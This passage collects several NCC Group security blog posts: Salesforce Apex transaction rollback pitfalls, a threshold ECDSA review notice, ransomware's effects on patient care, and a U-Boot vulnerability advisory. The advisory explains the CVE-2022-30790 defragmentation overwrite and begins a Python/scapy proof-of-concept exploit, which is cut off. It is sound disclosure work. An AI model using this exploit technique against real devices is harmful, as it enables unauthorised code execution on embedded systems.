May 23rd, 2022: Trendnet confirmed the fixes were present in the firmware to be released.

June 2nd, 2022: Trendnet released firmware version v1.0(601.130.1.1410).

Thanks to

Nicolas Bidron, Jennifer Fernick, and David Goldsmith for their support throughout the research and disclosure process. Thanks also to Trendnet for their ongoing cooperation.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Exception Handling and Data Integrity in Salesforce

14 June 2022 at 20:09

Robust exception handling is one of the tenets of best practice for development, no matter what the coding language. This blog post explores the curious circumstances in which a developer trying to do the right thing – but without appreciating the full effects – could introduce data integrity issues in a Salesforce Organization. As we’ll explore, the precise impact will vary according to what’s being done to which data, but the potential for consequences detrimental to security is clear.

The Salesforce platform tries to ensure data integrity by having an automatic rollback mechanism, delimited by the common database concept of a ‘transaction’. However, as is so often the case, the devil is in the detail. On the basis of recent code reviews, it is apparently under-appreciated how the addition of exception handling in Apex (the Salesforce development language) can affect the rollback mechanism, which in turn can affect data integrity. There have been a couple of notable articles on this subject in the past [1] as well as discussions on forum sites, but the treatment has been relatively light. After checking various permutations on a test Organization, this article qualifies and expands on existing material in this space, highlighting the potential consequences for security on top of more functional side effects. In other words, while the condition is not new, its impact as a security vulnerability is explored. It’s important to understand that this is not a vulnerability in the Salesforce platform itself but a bug that could arise during custom development whose impact may extend to security.

Background

The Data Manipulation Language (DML) is essentially the subset of Apex that allows access to the database, including write operations that SOQL (the Salesforce Object Query Language) doesn’t support. There are two ways to use DML: executing DML ‘statements’ or calling Database class methods. By way of example, the following two lines are equivalent:

1.  insert newAccounts;
2.  Database.insert(newAccounts);

Both ways accept a single sObject or, as the above examples imply, a List of sObjects. So what’s the difference? For one thing, using a Database class method (line 2) allows a finer degree of control for bulk operations: an optional allOrNone Boolean parameter governs whether processing should stop if an error is encountered [2]. The default value of this parameter is true, which means that a database error stops the processing of further sObjects in the List before an exception is thrown. This mode mirrors how a DML statement handles an error when working on a List. If allOrNone is explicitly set to false, partial processing is allowed: if an error occurs, the remaining work is still given a chance to complete. In addition, instead of throwing exceptions, a result object (or an array of them if a List is passed) is returned containing the status of each operation and any errors encountered. This allows the caller to inspect the results and handle any failures appropriately [3].

As mentioned in the opening remarks, Salesforce has the concept of a ‘transaction’ – a collection of database operations through a code path that has a definite start and end point. A classic example would be a call to an Aura endpoint by a client-side Lightning Component, where the start point would be the entry into the @AuraEnabled method and the end point would be its exit through the final return. In between, any number of other methods from any number of other classes could be called, and the collection of DML operations along the way would constitute this particular transaction. Salesforce documentation explains that:

…all changes are committed to the database only after all operations in the transaction finish executing and don’t cause any errors. [4]

While true in one sense, it doesn’t capture the full range of outcomes and how conditions can arise that may cause data integrity issues [5].

Risks to Data Integrity

Setting the allOrNone parameter to false in a call to a Database method is not accidental: it can be assumed that the caller wants partial processing. But a less obvious risk to data integrity can emerge when an exception is thrown within a try block after one or more DML operations have occurred, whether in the same try block or anywhere earlier in the transaction stack. The crucial point about automatic rollback is that it occurs after unhandled exceptions. But if the exception is caught [6], it is assumed the catcher knows what they are doing! If the catch block doesn’t explicitly handle any previous DML operations, those database changes will be committed – unless, of course, a new exception is thrown that either remains unhandled or is caught further up the stack where the database state is restored.

Reflecting on this, it’s relatively easy for a developer to write code that unintentionally makes a partial set of database changes under certain error conditions. This is like calling a Database method and setting allOrNone to false accidentally! The impact is obviously context-dependent, but it’s conceivable that the resulting state could have security implications.

Published examples in this area tend to have a DML operation as the cause of the exception, with a prior database operation being the problem to clean up. But an important point to highlight is that the exception need not relate to DML. Consider the following ‘proof-of-concept’ code:

// set up chgAccounts, a List of Accounts to update
try {
   update chgAccounts;   // need not be in this (or any) try block to be affected
   Account acc = [SELECT Name FROM Account WHERE Name = 'Acme'];
   // do something with acc, and maybe some other risky things
}
catch (Exception e) {}

Imagine one day that the Acme Account doesn’t exist anymore. Following the update, a System.QueryException is thrown because there is nothing to assign to the variable acc. Because the exception is caught (although ignored) the Account updates will be committed to the database. Note, as per the comment, that the update could be anywhere in the previous transaction path. This example also shows how the general bad practice of having empty catch blocks can have a specific consequence unique to Salesforce. However, even a valiant attempt at exception handling can still lead to data integrity problems if this specific aspect hasn’t been fully considered by the developer.

Whether the Account updates in the above case will have security implications, or indeed any kind of impact, will depend on the context. Let’s briefly consider a different scenario to illustrate a security risk. Imagine that custom code creates a new User during registration but, later in the transaction, an exception is raised and caught because a business logic check fails. Without adequate handling, the new user will still be created, and therefore the registrant could log in, contrary to business rules.

Finally, a particular use of the Database class is also worth calling out, whether it’s in a try block or not. Consider this single DML operation:

Database.update(newAccount, false);

Although the allOrNone parameter indicates that partial record processing is allowed, this method of database access will never throw exceptions and, in this example, the return values are effectively discarded. Therefore the caller has no idea of the success/failure status, whether a single sObject has been passed or a List. This may be acceptable in some cases, but it should be verified as such.

Recommendations

Any code path that includes a DML operation should be evaluated in full because a data integrity vulnerability could arise from an exception being caught at any point. Where custom exception handling is implemented, consider if any database changes earlier in the transaction need to be reverted manually. It is important to remember that catching an exception of any kind (not just one related to DML) could lead to a vulnerable condition. Clearly, using DML operations to reverse database changes should be avoided, since these too could raise exceptions, and round we go again. Instead, Salesforce supports a convenient ‘savepoint’ and ‘rollback’ mechanism [7].
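Applied to the earlier proof-of-concept, the savepoint mechanism might be used along these lines (an illustrative Apex sketch, not production-ready error handling):

```apex
Savepoint sp = Database.setSavepoint();
try {
   update chgAccounts;
   Account acc = [SELECT Name FROM Account WHERE Name = 'Acme'];
   // do something with acc, and maybe some other risky things
}
catch (Exception e) {
   // Revert the update and any other DML performed since the savepoint
   Database.rollback(sp);
   // then log, surface or rethrow the error as appropriate
}
```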

If partial record processing is used explicitly, it is imperative that the return values from the particular Database method are captured, inspected and handled appropriately [8], using a format such as:

Database.SaveResult[] results = Database.insert(mySObjects, false);
for (Database.SaveResult result : results) {
   // check result.isSuccess() etc.
}

While potentially vulnerable conditions can be relatively simple to spot in a single method or class, remember that a transaction spans the life of a particular execution path. Therefore, establishing whether a vulnerability exists, and its resulting impact, can involve traversing back up that path. Even an exception thrown outside a try block could still lead to a data integrity issue if it’s caught further up the stack. For these reasons, an exhaustive search for this kind of vulnerability is likely beyond the remit of most manual code reviews because of time constraints and the complexity of analysis [9].

In Summary

This article aims to raise awareness of a particular kind of Apex vulnerability. In truth, while the necessary conditions may be common, perhaps more common than previously realised, instances of an exploitable vulnerability with a tangible benefit to an attacker will be rarer. Functional side effects, or simply an ‘untidy’ database, are a more likely result, but which are nevertheless unwanted and best avoided. It all depends on the context, though, and exploitable attack opportunities leveraging this condition may well exist out there. Through articles such as this, hopefully developers and code reviewers alike will be better able to find them.

Jerome Smith @exploresecurity

(thanks to Viktor Gazdag @wucpi for proof-reading)

Notes

[1] For example, https://medium.com/elevate-salesforce/apex-transaction-control-a-dml-case-study-c4b535825205 and https://www.crmscience.com/single-post/2020/05/20/how-salesforce-developers-handle-errors-with-try-catch-rollback-best-practices.
[2] https://developer.salesforce.com/docs/atlas.en-us.apexref.meta/apexref/apex_methods_system_database.htm
[3] https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_dml_database.htm
[4] https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_dml_transactions.htm
[5] This is why I have so far avoided the term ‘atomic’ – either everything completes or no changes are made – when talking about a transaction. In contrast, a single DML statement, or a Database method call with allOrNone missing or true, will process a List of sObjects in a truly atomic fashion: one failure will cause all changes made to the preceding records in the List to be reverted before an exception is thrown.
[6] Occasionally, system exceptions cannot be caught. One example is System.LimitException, which is raised when ‘governor limits’ are exceeded. If this exception is thrown, even within a try block, automatic rollback will follow because an unhandled error has been thrown. More information at https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_dml_examples.htm and https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/apex_exception_statements.htm.
[7] https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_transaction_control.htm
[8] https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_dml_database_error.htm
[9] This is potentially something that static analysis tools could do, however. The current capability of Apex analysers has not been investigated during the research for this article.

Public Report – Threshold ECDSA Cryptography Review

15 June 2022 at 18:04

In March 2022, DFINITY engaged NCC Group to conduct a security and cryptography review of a threshold ECDSA implementation, which follows a novel approach described in the reference paper entitled “Design and analysis of a distributed ECDSA signing service” and available on the IACR ePrint archive at https://eprint.iacr.org/2022/506. The threshold ECDSA protocol will be deployed into the architecture of the Internet Computer. The ability for canisters to perform threshold signature generation and verification will facilitate the integration of the Internet Computer with other blockchains using ECDSA signatures, including Bitcoin and Ethereum.

The project methodology primarily relied upon manual code review supported by dynamic interaction with the test cases, as well as review of the supporting reference paper. Following this review, in early May 2022, NCC Group performed a retest of the findings uncovered during the initial engagement. That follow-up engagement also included the review of a short pull request incorporating changes to the underlying encryption scheme.

The Public Report for this review may be downloaded below:

Understanding the Impact of Ransomware on Patient Outcomes – Do We Know Enough?

16 June 2022 at 08:15

The healthcare sector and ransomware attacks appear together frequently in the media. Since before the start of the pandemic, rarely a week has gone by without at least one story about a healthcare organisation falling victim to a ransomware attack. We often hear about the financial impact these attacks have or how they can affect patient safety, but there is little to state what the actual impact on patient outcomes is.

Articles about a ransomware attack that could be found to be the cause of a death, or vulnerabilities in a specific medical device, are very important in bringing these issues into the public eye. However, they do not explain or even truly allude to where clinical risk is negatively impacted the most, and that is what should ultimately be the priority when discussing cyberattacks in healthcare.

According to statistics obtained from publications produced by the European Union Agency for Cybersecurity (ENISA) and the FBI’s Internet Crime Complaint Center (IC3), ransomware attacks since 2017 have increased in general year on year (apart from 2018, where attacks decreased compared to the previous year). This could be attributed to several reasons such as the growth of ransomware, widespread vulnerabilities affecting a multitude of organisations, and of course the pandemic contributing to a decrease in user vigilance and expanding the security boundaries of organisations. [1] [2] [3] [4] [5] [6] [7] [8] [9] 

IC3 Annual Report Data

Contradicting the trend is the UK: according to the annual Cyber Security Breaches Surveys, the percentage of breaches caused by ransomware attacks across all sectors has been steadily decreasing. However, ransomware remains one of the top three threats to UK businesses and charities. [10] [11] [12] [13] [14]

UK Cyber Security Breaches Survey Data

Although these statistics are not just about ransomware in the healthcare sector, the IC3 report from 2021 [11] shows that the healthcare and public health sector reported the most ransomware attacks. The number of healthcare organisations that reported being a victim of a ransomware attack was 148, significantly more than the next sector on the list, financial services, with 89 organisations. A survey conducted by Sophos [15] stated that 34% of 328 responding organisations were hit by ransomware in the previous year (2020).

Similarly, the ENISA Threat Landscape 2020 [3] states “Healthcare organisations were the favourite target of ransomware attackers during all of the previous years, and this trend also continued in 2019.”

This would indicate that the healthcare sector remains a viable target as many organisations in this sector are considered soft targets. Furthermore, healthcare organisations are more likely to pay the ransom. [16]

Regardless of the fall or rise in the number of victims of ransomware, the continued attacks on the healthcare sector demonstrate callous behaviour towards patients’ wellbeing, the medical professionals and support staff of the healthcare organisations caring for those patients. 

Current research on the impact of ransomware attacks on patient health 

Ransomware attacks in healthcare environments can lock medical professionals out of workstations, disrupt access to services, prevent access to patient records, disable medical devices and prevent delivery of urgent care. With so many attacks occurring in the healthcare sector, the impact this has on patient outcomes could be disastrous, and even lead to death in extreme cases. 

When discussing the impact that ransomware has on patient outcomes it is important to consider all circumstances and not just the most critical cases, although these should clearly be prioritised. A search using phrases such as “ransomware impact patient” and “ransomware impact health” was used on Google scholar, PubMed, ProQuest, and general searches using Google and Bing to try and find any related research that had already been conducted and could shed some light on how ransomware impacts patient outcomes. 

Although the literature search was not exhaustive, it appears this topic has not been thoroughly researched. Only a few publications contained conclusions as to whether a ransomware attack did in fact have a negative effect on patient outcomes. Furthermore, the results were inconsistent, which in all likelihood reflects the complex nature of healthcare environments but could also indicate more detailed research and analysis is required.

Direct impact 

One of the most notorious incidents in recent years is that of the ransomware attack on a university hospital in Düsseldorf, Germany. Whilst enroute with a 78-year-old woman in a deteriorating state, paramedics were redirected to an alternative hospital 32 kilometres away due to systems being unavailable from the attack. The delay in treatment caused by the additional transfer time was initially suspected to have contributed to the patient’s death. However, the investigation later found that the patient’s condition was so severe at the time she was picked up that “The delay was of no relevance to the final outcome,” as reported by Wired [17]. 

Another incident occurred in 2019, in which an infant died at a hospital that was in the midst of a ransomware attack. The lawsuit states “Because numerous electronic systems were compromised by the cyberattack, fetal tracing information was not accessible at the nurses’ station or by any physician or other healthcare provider who was not physically present in Teiranni’s labor and delivery room. As a result, the number of healthcare providers who would normally monitor her labor and delivery was substantially reduced and important safety-critical layers of redundancy were eliminated.” [18]. 

Whilst the tragedy of these cases should not be understated, they only account for a small part of the overall effect that ransomware or any IT/OT outage could have in a healthcare environment. 

Rerouting 

A retrospective analysis was conducted after a successful ransomware attack on a health system in Southern California sent a large influx of patients to two emergency departments at the University of California San Diego. The increase in demand for care was above any expected increase from other situations such as flu season; however, the analysis did not involve determining the impact on patient outcomes. [19] [20]

Whilst not linked to ransomware, the following highlights that a delay in care can have a negative impact on patient outcomes. Analysis of Medicare data [21] relating to patients suffering from a heart attack concluded that delays in ambulance journeys due to road closures (in this instance because of a marathon taking place) increased the 30-day mortality rate (a death occurring within 30 days of a defined event).

Remediation effects 

A research paper on the effect a data breach has on patient outcomes determined that “Hospital data breaches significantly increased the 30-day mortality rate for AMI” (AMI – Acute Myocardial Infarction, also known as a heart attack). The researchers also stated that “Ransomware attacks are considered to be more disruptive to hospital operations than the breaches considered in this study… If disruption to information technology used by providers is driving the breach effect, the findings from our study suggest that ransomware attacks may have an even stronger negative impact on patients than the breaches studied in this paper.” [22]. The researchers suggest that the changes to health information technology (HIT) as well as new policies and procedures following a data breach contribute to the increase in 30-day mortality and the longevity of the impact. 

The CyberPeace Institute released a report [23] in March 2021 that references research conducted at Vanderbilt University. Similar to the previous paper, this research discovered that remediation efforts following a data breach caused an increase in the 30-day mortality rate of patients suffering from a heart attack up to 3 years after the initial breach. 

Large scale attacks 

An article published in Nature.com [24] analysed data from the WannaCry attack on the NHS. Interestingly, the research found "no significant effect demonstrated on mortality across all hospitals". However, the article also details "The NAO stated that there were no reports of patient harm from NHS organisations.1 This is difficult to quantify, and as discussed, mortality is a crude measure of patient harm. While the attack may not have led to a direct impact on mortality, we are unable to ascertain the true impact on complications, patient morbidity, or changes in care processes that resulted from the attack."

This is a key point as a negative outcome that does not lead to death can still have a significant impact on a patient’s life. For example, a delay in care that leads to paralysis, or organ failure that then requires the patient to have a transplant. Situations like this affect the patients’ quality of life as well as medical staff time and resources. 

Many respondents from a recent survey conducted by the Ponemon Institute [25] reported that a ransomware attack caused longer stays in hospital and delays that resulted in poor outcomes. 

The most convincing study [26] to date is one conducted by the Cybersecurity and Infrastructure Security Agency (CISA). This study was primarily concerned with the impact of COVID-19 on the Provide Medical Care National Critical Function in the US. The study was also able to gain insights into the impact that ransomware has on hospitals which found that “Although there are no deaths directly attributed to hospital cyberattacks, statistical analysis of an affected hospital’s relative performance indicates reduced capacity and worsened health outcomes”. 

What data is missing about the impact of ransomware attacks on patient health? 

What does all this mean? Currently we do not know enough about the effects that ransomware has on patient outcomes. Delays in care can cause negative outcomes, and the average amount of downtime caused by ransomware reached 26 days according to Coveware [27]. It stands to reason, then, that a ransomware attack would incur negative outcomes as well.

Furthermore, this is only considering the immediate downtime caused by the event. What about continued delays due to any backlogs that have occurred? Ransomware attacks, or any prolonged cyberattack or IT/OT outage, could result in long-term effects of a wide variety of medical conditions as well as the psychological effect on patients including a lack of trust whereby patients do not disclose information that might be key to diagnosis. Not to mention the effect that the resultant fatigue can have on medical staff [28]. 

The Department of Health and Social Care (DHSC) in the UK recently outlined the new cyber security strategy for health and social care, this included “calling for input from around the sector to improve the understanding of how cyber relates to patient outcomes and identify the important elements.” [29]. 

Attack vectors and targeted systems

Few details exist on the root cause of successful attacks, and depending on what resource you consult, the order of common attack vectors differs. A quarterly report from Coveware [27] lists the top three ransomware attack vectors across all industries over the past three years as RDP, email phishing, and software vulnerabilities. The most common attack vector according to respondents from the Ponemon study [25], however, was through cloud applications. Analysis in 2020 conducted by researchers at Tenable found a key method for gaining access to hospital networks was through a pair of Citrix vulnerabilities [30].

Electronic Patient/Health/Medical Records (EPR, EHR, EMR) are also prime targets for attackers. Medical records contain a lot of valuable data that can be used for several kinds of fraud, especially in countries where healthcare is not paid for by the state. Preventing access to these systems will disrupt the delivery of care. Vital information becomes unavailable to help treat patients and therefore exerts overwhelming pressure on healthcare organisations to pay the ransom.

The attack on the Health Service Executive (HSE), Ireland’s public health service, prevented access to all the IT systems and took four months to decrypt all the servers [31]. This meant access to patient records and scans were not available for extended periods of time. 

Downtime in laboratories also causes significant issues, as Laboratory Information Systems (LIS) and clinical labs are very reliant on interconnectivity between systems [32]. Delays in ordering tests and receiving results can have an impact on clinical decision making.

How to better understand the impact of ransomware events? 

Given the complexity of the healthcare industry it would be beneficial to understand not just the immediate impact of ransomware attacks but also the medium and long-term effects as well. Knowing what could happen in the first few hours, 5 years, and key points in between would help develop preventative actions. It would also help prepare for potential consequences and care requirements in the event of a successful attack. 

Metrics could include: 

  • The effects on individual and/or groups of illnesses 
  • The short/medium/long-term resources required to facilitate the effects on patients 
  • A breakdown of what systems and departments are affected 
  • The percentage of movement in clinical risk – for example, how many low-risk cases escalate to medium-risk due to a delay in care 
  • Number of cases referred to neighbouring facilities 

A more in-depth retrospective analysis of the WannaCry attack on the NHS as well as ongoing analysis of the HSE attack would be extremely useful in shaping how healthcare organisations prepare for, respond to, and recover from ransomware attacks. 

What do we need to know to be able to address this problem? 

Being able to analyse current or previous events more thoroughly is one way to understand the true impact that ransomware attacks have on healthcare organisations. However, data gathered from a previous or current attack may not be accurate or complete as a result of the increase in stress and load on staff and resources. 

Another option could be to use simulations and AI/ML to predict how ransomware attacks affect patient outcomes. A recent paper [33] details the results of adapting an established simulation model, originally used for evaluating operational strategies [34], to assess the resilience of hospitals to cyberattacks. In conjunction with a simulation of this type, it might be possible to apply AI/ML to predict specific medical issues [35] [36] [37] [38] or patient outcomes in general [39]. 

Imagine a healthcare organisation being able to understand with some confidence what the impact would be on any or all of their patients, based on which systems were down, how long those systems were down for, and whether services were available at a neighbouring facility. 

It is important to understand the real impact: prolonged cyberattacks have the potential to cause significant harm, but they are unlike other disaster situations. Power outages can be protected against with backup generators that kick in quickly; weather patterns can, to a certain extent, be predicted and planned for. Ransomware can strike at any moment, take out an unpredictable number of systems, affect multiple organisations simultaneously over large geographic distances, and recur at the whim of attackers if remediation efforts are insufficient or non-existent. More importantly, ransomware can, to an extent, be prevented by following security best practices such as hardening systems and devices, properly segregating networks, and installing security patches and updates.

From a financial perspective, the ability of a healthcare organisation to return to a functioning state and implement remediation objectives could be hampered by the additional strain of lawsuits. A worrying statistic reported by Healthcare Finance News [40] shows an increase in lawsuits filed against healthcare organisations over data breaches. 

As such, disaster recovery plans should include recovery from ransomware attacks as part of the strategy, arguably as a priority. The HSE report [31] and the simulation research [33] note, respectively, the absence of preparation for relevant scenarios, “In addition, as is the case with many other organisations, the scenario of sustained loss of IT across the entire health service has not been planned for, with specific considerations and playbooks,” and the lack of consideration of a cyberattack as a hazardous event, “while the impact of a wide variety of hazard event types on hospital capability and capacity were studied, cyberattack was not previously considered in these models.” 

Cyberattacks targeting the healthcare sector, as with any other industry, do not respect borders, so international collaboration around research and information-sharing is important. With more diverse input about the impact on different communities, populations, economies, and geographic areas, we can build better solutions to the problem, helping to ease the burden on healthcare professionals and resources and contributing to the prevention of poor patient outcomes.

Next steps

It would be beneficial to expand on previous research and take a deep dive into hospital data from just prior to the WannaCry attack up to today, concentrating on a small but varied number of health issues that have the potential to demonstrate if and how delays in care caused by ransomware affect patient morbidity. Using examples of hospitals that were able to transfer patients to neighbouring facilities, as well as hospitals that were not, is important to understand both the immediate and the cascading effects.

This would hopefully lay the foundations for creating configurable ransomware simulations, enabling a more proactive approach that helps prevent attacks and gives a better understanding of where clinical resources should be prioritised.

References 

[1] https://www.enisa.europa.eu/publications/enisa-threat-landscape-report-2017 

[2] https://www.enisa.europa.eu/publications/enisa-threat-landscape-report-2018 

[3] https://www.enisa.europa.eu/publications/ransomware 

[4] https://www.enisa.europa.eu/publications/enisa-threat-landscape-2021 

[5] https://www.ic3.gov/Media/PDF/AnnualReport/2017_IC3Report.pdf 

[6] https://www.ic3.gov/Media/PDF/AnnualReport/2018_IC3Report.pdf 

[7] https://www.ic3.gov/Media/PDF/AnnualReport/2019_IC3Report.pdf 

[8] https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf 

[9] https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf 

[10] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/609186/Cyber_Security_Breaches_Survey_2017_main_report_PUBLIC.pdf 

[11] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/702074/Cyber_Security_Breaches_Survey_2018_-_Main_Report.pdf 

[12] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/950063/Cyber_Security_Breaches_Survey_2019_-_Main_Report_-_revised_V2.pdf 

[13] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/893399/Cyber_Security_Breaches_Survey_2020_Statistical_Release_180620.pdf 

[14] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/972399/Cyber_Security_Breaches_Survey_2021_Statistical_Release.pdf 

[15] https://assets.sophos.com/X24WTUEQ/at/s49k3zrbsj8x9hwbm9nkhzxh/sophos-state-of-ransomware-in-healthcare-2021-wp.pdf 

[16] https://news.sophos.com/en-us/2022/06/01/the-state-of-ransomware-in-healthcare-2022/

[17] https://www.wired.co.uk/article/ransomware-hospital-death-germany 

[18] https://www.documentcloud.org/documents/21072978-kidd-amended-complaint 

[19] https://www.medpagetoday.com/meetingcoverage/acep/95357 

[20] https://www.researchgate.net/publication/355630183_162_Regional_Emergency_Department_Census_Impacts_During_a_Cyber_Attack 

[21] https://www.nejm.org/doi/full/10.1056/NEJMsa1614073 

[22] https://arxiv.org/pdf/1904.02058.pdf 

[23] https://cyberpeaceinstitute.org/report/2021-03-CyberPeaceInstitute-SAR001-Healthcare.pdf 

[24] https://www.nature.com/articles/s41746-019-0161-6 

[25] https://www.censinet.com/ponemon-report-covid-impact-ransomware 

[26] https://www.cisa.gov/sites/default/files/publications/CISA_Insight_Provide_Medical_Care_Sep2021.pdf 

[27] https://www.coveware.com/blog/2022/5/3/ransomware-threat-actors-pivot-from-big-game-to-big-shame-hunting 

[28] https://www.theguardian.com/society/2022/jun/04/sleep-deprived-medical-staff-pose-same-danger-on-roads-as-drunk-drivers 

[29] https://www.ukauthority.com/articles/five-pillars-in-cyber-strategy-for-health-and-social-care/ 

[30] https://www.zdnet.com/article/ransomware-attacks-now-to-blame-for-half-of-healthcare-data-breaches/ 

[31] https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf 

[32] https://academic.oup.com/ajcp/article/157/4/482/6533636 

[33] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8638073/ 

[34] https://www.tandfonline.com/doi/abs/10.1080/24725579.2019.1584132 

[35] https://www.insideprecisionmedicine.com/artificial-intelligence/ai-used-to-calculate-individual-risk-of-repeat-stroke/ 

[36] https://www.scientificamerican.com/article/ai-can-predict-kidney-failure-days-in-advance/ 

[37] https://www.nbcnews.com/mach/science/ai-predicts-heart-attacks-better-doctors-n752011 

[38] https://www.futuremedicine.com/doi/full/10.2217/fon-2021-0302 

[39] https://www.nature.com/articles/s41746-018-0029-1 

[40] https://www.healthcarefinancenews.com/news/patients-increasingly-suing-hospitals-over-data-breaches 

Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)

16 June 2022 at 21:15

By Nicolas Bidron, and Nicolas Guigo.

[Editor’s note: This is an updated/expanded version of these advisories which we originally published on June 3 2022.]

U-Boot is a popular boot loader for embedded systems, with implementations for a large number of architectures, and is prominent in most Linux-based embedded systems such as ChromeOS and Android devices.

Two vulnerabilities were uncovered in the IP defragmentation algorithm implemented in U-Boot; the associated technical advisories are provided below.

Exploitation proofs of concept and results are provided in each technical advisory below.

Technical Advisories:

Hole Descriptor Overwrite in U-Boot IP Packet Defragmentation Leads to Arbitrary Out of Bounds Write Primitive (CVE-2022-30790)

Project: U-Boot
Project URL: https://source.denx.de/u-boot/u-boot
Versions affected: all versions up to commit b85d130ea0cac152c21ec38ac9417b31d41b5552
Systems affected: all systems defining CONFIG_IP_DEFRAG
CVE identifier: CVE-2022-30790
Advisory URL: link
Risk: Critical 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Authors: Nicolas Guigo, Nicolas Bidron

Summary

U-Boot is a popular boot loader for embedded systems, with implementations for a large number of architectures, and is prominent in most Linux-based embedded systems.

Location

In u-boot/net/net.c, the __net_defragment function, lines 900 through 1018.

Impact

The U-Boot implementation of RFC 815 (IP Datagram Reassembly Algorithms) is susceptible to a Hole Descriptor overwrite attack, which ultimately leads to an arbitrary write primitive.

Description

In compiled versions of U-Boot that define CONFIG_IP_DEFRAG, a value of ip->ip_len (the IP packet header’s Total Length field) higher than IP_HDR_SIZE and strictly lower than IP_HDR_SIZE+8 leads to a value of len between 1 and 7. The subsequent truncated division by 8 then yields 0, forcing the hole metadata and the fragment to point to the same location. The subsequent memcpy overwrites the hole metadata with the fragment data. Through a second fragment, this attacker-controlled metadata can be exploited to perform a controlled write to an arbitrary offset.

This bug is only exploitable from the local network, as it requires crafting a malformed packet which would most likely be dropped during routing. However, it can be effectively leveraged to locally root Linux-based embedded devices.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

The last line of the previous excerpt from u-boot/net/net.c shows how the attacker can control the value of len to be strictly lower than 8 by issuing a packet with ip_len between 21 and 27 (IP_HDR_SIZE has a value of 20).

Also note that offset8 here is 0, which leads to thisfrag = payload.
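The effect of that arithmetic can be sketched in a few lines of Python (a model of the C code's integer math only, not U-Boot code itself):

```python
# Sketch of the integer arithmetic in __net_defragment() for CVE-2022-30790.
# IP_HDR_SIZE is 20 in U-Boot; the values here only model the C code's math.
IP_HDR_SIZE = 20

def hole_offset(ip_len):
    """Model of len and len/8 as computed by __net_defragment()."""
    length = ip_len - IP_HDR_SIZE   # the attacker controls ip_len in the IP header
    # For the positive values modelled here, Python's // matches C's
    # truncating integer division.
    return length, length // 8

# For every ip_len between 21 and 27, len is 1..7 and len/8 truncates to 0,
# so newh = thisfrag and the fragment data lands on top of the hole metadata.
for ip_len in range(21, 28):
    length, quotient = hole_offset(ip_len)
    assert 0 < length < 8 and quotient == 0
```

This is the window the first malicious packet exploits: any total length in the 21-27 range collapses the hole bookkeeping onto the fragment itself.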

	} else if (h >= thisfrag) {
		/* overlaps with initial part of the hole: move this hole */
		newh = thisfrag + (len / 8);
		*newh = *h;
		h = newh;
		if (h->next_hole)
			payload[h->next_hole].prev_hole = (h - payload);
		if (h->prev_hole)
			payload[h->prev_hole].next_hole = (h - payload);
		else
			first_hole = (h - payload);

	} else {

Later in the same function, execution reaches the above code path. Here, len / 8 evaluates to 0 leading to newh = thisfrag. Also note that first_hole here is 0 since h and payload point to the same location.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

In the above excerpt, the call to memcpy() overwrites the hole metadata (since thisfrag and h both point to the same location) with arbitrary data from the fragmented IP packet. With a len value of 6, the last_byte, next_hole, and prev_hole fields of the first_hole all end up attacker-controlled.

Finally, the arbitrary write is triggered by sending a second fragment packet, whose offset and length only need to fit within the hole pointed to by the previously controlled metadata (next_hole) set up by the first packet.

Recommendation

This bug was fixed in commit b85d130ea0cac152c21ec38ac9417b31d41b5552 on U-Boot master’s branch. Update to the latest version to obtain the fix.

Proof of Concept for exploitation and Results

Exploitation was attempted against a build of U-Boot for Raspberry Pi 4 with IP_DEFRAG enabled. The device was set to attempt loading the kernel through U-Boot’s dhcp method; this ensures that the device gets an IP address and enables its Ethernet interface, allowing the malicious payload to be delivered by an adjacent machine on the network (connected to the same switch).

The following Python script was used to send the first malicious packet, which overwrites the initial __net_defragment() hole metadata with the contents of a specially crafted hole structure. The second packet then triggers the memory overwrite at the offset set up by the first packet’s next_hole. In this proof of concept the write led to a crash, but the payload can be adjusted to achieve controlled memory writes against the target.

import ctypes
from sys import argv
from scapy.all import *

# struct endianness based on arch
class hole(ctypes.LittleEndianStructure):
  _pack_ = 1
  _fields_ = [('last_byte', ctypes.c_ushort),
              ('next_hole', ctypes.c_ushort),
              ('prev_hole', ctypes.c_ushort),
              ('unused', ctypes.c_ushort)]
  def __init__(self, lb, nh, ph):
    return super().__init__(lb, nh, ph, 0xFEFE)

# U-Boot IP Fragment Hole Overwrite
def frag_hole_overwrite():
  # Prepare the malicious hole
  hh = hole(0x10, 0x07FD, 0xFFFF)
